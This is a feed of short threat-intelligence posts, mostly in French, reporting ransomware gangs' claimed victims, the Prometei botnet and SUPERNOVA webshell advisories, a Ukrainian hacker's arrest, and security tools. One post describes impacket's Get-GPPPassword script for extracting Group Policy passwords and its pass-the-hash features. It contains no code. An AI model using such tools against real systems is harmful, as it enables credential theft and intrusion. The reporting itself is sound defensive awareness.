👁 socat @socat@nanao.cybtex.fr

Prometei administrators have some of the technical groundwork in place should they want to embrace more « destructive payloads »

https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities

A threat actor connected to the entity's network via a Pulse Secure virtual private network (VPN) appliance, moved laterally to its SolarWinds Orion server, installed malware referred to by security researchers as SUPERNOVA (a .NET webshell), and collected credentials.

SUPERNOVA is a malicious webshell backdoor that allows a remote operator to dynamically inject C# source code into a web portal to subsequently inject code. APT actors use SUPERNOVA to perform reconnaissance, conduct domain mapping, and steal sensitive information and credentials.

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a

Les opérateurs de ransomware Astro Team revendiquent une attaque contre :

• 🇺🇸 CREST Hotel & Suites

Located in South Beach, Crest Hotel Suites is within a 5-minute walk of popular attractions such as Fillmore Miami Beach and New World Center. This 65-room, 3.5-star hotel has a restaurant along with conveniences like an outdoor pool and free in-room WiFi.

#USA #ASTROTEAM #HOTEL #DATABREACH #TOURISME #RANSOMWARE #ASTRO #TRAVEL #CUSTOMERS #COMPANIES #VOYAGES #BUSINESS #SALES #MARKETS #BRANDS #SERVICES #WORLD

Les opérateurs de ransomware Astro Team revendiquent des attaques contre :

• 🇺🇸 StoneGate Senior Living, LLC (stonegatesl.com)

We provides support services to senior living and care properties that offer skilled health care, assisted living, memory support and independent living at locations in Texas, Oklahoma, and Colorado. Founded and led by a team of senior living industry veterans, StoneGate understands that careful attention to customer expectations is vital to the success of a senior living and care community.

• 🇮🇹 Pezzuto Group Srl (pezzutogroup.it)

Dal novembre 2012 ad oggi, Pezzuto Group è diventato un punto di riferimento per Audi e Volkswagen sul territorio. Solo nel 2015, Pezzuto Group ha scalato la Top 30 dei concessionari Volkswagen italiani, riuscendo a centrare ogni mese il 100% degli obiettivi aziendali prefissati e viaggiando su una media di circa 1000 nuovi clienti ogni anno.

#ITALY #USA #ASTRO #RANSOMWARE #ITALIE #ASTROTEAM #DATABREACH #ITALY #USA #ASTRO #RANSOMWARE #ITALIE #ASTROTEAM #DATABREACH #SERVICES #SUPPORT #SENIOR #HEALTHCARE #INDEPENDENT #TEAM #INDUSTRY #VETERANS #HEALTH #INFORMATION #CUSTOMERS #COMMUNITY #AUTOMOBILE #AUTO #AUTOMOTIVE #COMPANY #CLIENTS #CUSTOMERS #CARS #BUSINESS #CARE #FINANCIAL

impacket - GPP Passwords

Added Get-GPPPassword in examples. It's a python script for extracting and decrypting Group Policy Preferences passwords using streams for treating files instead of mounting shares, allowing for running this script inside regular docker containers. This also allows for pass-the-hash, pass-the-ticket, pass-the-key, overpass-the-hash, features that the Metasploit Framework doesn't offer.

#INFORMATIQUE #SECURITY #PYTHON #TOOLS

🛠 https://github.com/SecureAuthCorp/impacket/pull/1064

Sebastien Larinier vient de sortir Pyeti-python.

Pyeti-python allows you to extract data from YETI such as specific observables (malware, IP, domains...). It can be used to plug in your own tool and enrich your Threat Intelligence feed with YETI « Your Everyday Threat Intelligence » is a platform meant to organize observables, IoC, TTPs, and knowledge on threats in a single, unified repository.

#INFORMATIQUE #PYTHON #TOOLS #OPENSOURCE #SECURITY #INTELLIGENCE #LINUX #CYBER #THREATS

🛠 https://github.com/yeti-platform/pyeti

Кіберфахівці СБУ спільно з американськими правоохоронцями викрили хакера на Херсонщині

Un ukrainien a été interpellé par le SBU (СБ України) dans le cadre d'une enquête sur des vols concernant plusieurs dizaines de millions de dollars appartenant à des banques canadiennes et américaines.

Ukraine's SBU State Security Service has detained a Ukrainian hacker who stole tens of millions of U.S. dollars from U.S. and Canadian banks

#CYBER #UKRAINE #USA #CANADA #BANKING

https://ssu.gov.ua/novyny/sbu-zatrymala-ukrainskoho-khakera-yakyi-vkrav-desiatky-milioniv-dolariv-z-amerykanskykh-i-kanadskykh-bankiv

Les opérateurs derrière le ransomware Darkside revendiquent une attaque contre :

• 🇺🇸 BTU International, Inc. (btu.com)

Founded in 1950, the company focuses on thermal processing equipment for alternative energy and electronics, such as semiconductor packaging, solar cell manufacturing, printed circuit board assembly, and nuclear fuel processing.

#USA #RANSOMWARE #DARKSIDE #DATABREACH #INTERNATIONAL #SEMICONDUCTOR #INDUSTRY #EQUIPMENT #SOLUTIONS #ENERGIES #MARKET #ELECTRONICS #CYBER #MANUFACTURE #INDUSTRIAL #SOLAR #ASSEMBLY #TECHNOLOGIES #DESIGN #CAREERS #NUCLEAR #COMPANIES

Les systèmes informatiques et téléphoniques de Cegos SA (cegos.fr) paralysés depuis le 15 avril 2021 suite à une attaque informatique.

#LEARNING #RANSOMWARE

https://www.cegos.fr/actualites/news/cegos-a-ete-la-cible-dune-attaque-cyber

Les opérateurs derrière le ransomware Avaddon revendiquent une attaque contre :

• 🇫🇷 Protectim Security Services (protectim.fr)

Protectim Security Services a été la première société de sécurité à s'équiper d'un centre de commandement en pointe qui offre une vision en temps réél de toute l'activité déployée sur tout le territoire français. Ce centre a un rôle d'alerte et permet de superviser chaque équipe avec la plus grande réactivité. Nous mettons en place des dispositifs de sécurité qui créent de la valeur. Le nouveau contexte sécuritaire a placé nos agents en première ligne : leurs savoir-faire en matière de profilage tranquillisent vos clients.

#FRANCE #RANSOMWARE #AVADDON #DATABREACH #SURVEILLANCE #SÉCURITÉ #AGENTS #VIP #SECRETS

Les opérateurs derrière le ransomware Babuk revendiquent une attaque contre :

• 🇪🇸 Phone House (phonehouse.es)

As a specialist in telecommunications, Phone House had clearly defined its core product offering and found its niche as a benchmark in the Spanish mobile market for more than 20 years.

Babuk have downloaded full dump of your 10 Oracle databases (more than 100Gb) which containts GDPR information of more than 3 million customers and employees.

#SPAIN #BABUK #MOBILE #RANSOMWARE #TELECOM #DATABREACH #ESPAGNE

Les opérateurs derrière le ransomware Marketo revendiquent des attaques contre :

• 🇺🇸 Newbridge Securities (newbridgesecurities.com)

We provide full-service securities brokerage and investment banking services. Newbridge Securities has over 80 locations in the US, ready to serve your financial needs.

• 🇺🇸 American Signal Corp. (americansignal.com)

American Signal Corp., ASC Mass Notification Solutions, has structured our domestic sales into the following regions in order to provide timely and accurate responses to our customer's needs and requests. Military and Nuclear Power customers have dedicated professionals.

• 🇺🇸 (lime-energy.com)

Lime Energy offers energy consulting services. Lime has been working with small and medium-sized businesses and our utility clients for more than 25 years. In New York alone, we've provided energy efficiency solutions to 34,245 small businesses in just six years. Our state-of-the-art LED technology can help reduce energy consumption by up to 80 percent.

• 🇺🇸 Auto Parts Manufacturing Mississippi (apmmguntown.com)

APMM is one of the top leading suppliers in North America for the Toyota Corolla manufactured in Blue Springs, MS.

#USA #RANSOMWARE #MARKETO #DATABREACH #CYBER #THREATS #MILITARY #NUCLEAR #BANKING #AUTOMOTIVE #INDUSTRY #ENERGIES #SERVICES

Les opérateurs derrière le ransomware Babuk revendiquent une attaque contre :

• 🇫🇷 Marietton Développement (mariettondeveloppement.fr)

Marietton Développement, premier acteur indépendant du tourisme en France. Créée en 1968 par la famille Abitbol, la première agence de voyages du groupe, rue Marietton à Lyon, est devenue aujourd'hui un groupe de plus de 1650 collaborateurs, doté d'une implantation nationale et d'une complémentarité dans les métiers du tourisme.

#FRANCE #RANSOMWARE #BABUK #DATABREACH #TOURISME #VOYAGES #INDEPENDENT #INVESTISSEMENTS #WORLD #TRAVEL #NETWORK #GROUP #FINANCIAL #DIGITAL #AGENCE #CYBER #CUSTOMERS #INVESTMENTS #PRODUCTION #INVESTISSEURS #DESTINATIONS #METIERS #AGENCES #CARRIERES #GROUPE #PRESSE #MULTIMARQUES #COMPANIES #DÉVELOPPEMENT #INVESTORS #MARQUES #BUSINESS #SALES #DEVELOPPEMENT #MARKETS #AFFAIRES #ADMINISTRATIONS #BRANDS #ENTREPRISES #CAREERS #PRESTATAIRES #SOLUTIONS #ASSOCIATIONS #ORGANIZATIONS #SERVICES

Les opérateurs derrière le ransomware Babuk revendiquent une attaque contre :

• 🇺🇸 Mankato Ford (mankatoford.net)

Ford dealership in Mankato for a variety of new & used cars, parts, auto service, and financing. Mankato Ford is a family owned dealership committed to providing a great customer experience. We are a full service dealership with Quick Lane near North Mankato, Nicollet, New Ulm, Eagle Lake MN and Saint Peter MN.

#USA #RANSOMWARE #BABUK #DATABREACH #MANKATO #CARS #AUTOMOTIVE #PREMIUM #INVENTORY #BUSINESS #AUTO #FINANCIAL #EXPERT #TEAM #DEALERSHIP #SALES #FORD #TRUCKS #SUV #SHOP #SEDAN #MODELS #VAN #WAGON #CONVERTIBLE #DRIVING #MONEY #BRANDS #STOCK #INVENTORY #VEHICLES #RELIABILITY #LOANER #MARKET #GENUINE #SERVICES #PRICES #BUDGET #PAYMENT #LICENSE #INCENTIVES #SHOWROOM #CERTIFIED #FEATURED #APPLICATION #CUSTOMERS #SHOPPING #SCHEDULE #ACCESSORIES

Les opérateurs derrière le ransomware Avaddon revendiquent une attaque contre :

• 🇫🇷 Groupe ALIZON INDUSTRIE (alizonindustrie.fr)

Fabrication et commercialisation en gros et en interentreprises de fournitures, d'equipements industriels divers. Spécialisée dans les achats industriels. Plus de 26 000 références produits autour de 3 univers, les rubans adhésifs, les colles techniques, consommables et machines d'emballages. Les sociétés Accept, Ridec, Leroy, Excel Services, Steelplast, Evolufil, Filiplast, Pool Management, Alliance Services Distribution font parties du Groupe ALIZON INDUSTRIE.

#FRANCE #RANSOMWARE #AVADDON #DATABREACH #SUPPLYCHAIN #INDUSTRY #SERVICES #LOGISTIC #COVID19 #BUSINESS #INDUSTRIE #SUPPORT #APPROVISIONNEMENT #INDUSTRIES #SOLUTIONS #CERTIFICATIONS #COFRAC #INTERTEK #ECOVADIS #MANAGEMENT #SUPPLY #CAREERS #CANDIDATURES #DEVELOPPEMENT